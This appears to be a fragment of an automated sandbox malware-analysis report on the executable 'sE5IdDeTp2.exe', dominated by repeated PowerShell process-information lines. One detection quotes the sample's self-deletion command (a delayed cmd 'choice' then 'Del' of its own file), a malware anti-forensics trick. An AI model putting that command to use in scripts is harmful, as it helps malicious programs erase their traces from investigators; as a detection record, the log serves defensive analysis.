Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\sE5IdDeTp2.exe"
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\sE5IdDeTp2.exe"			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
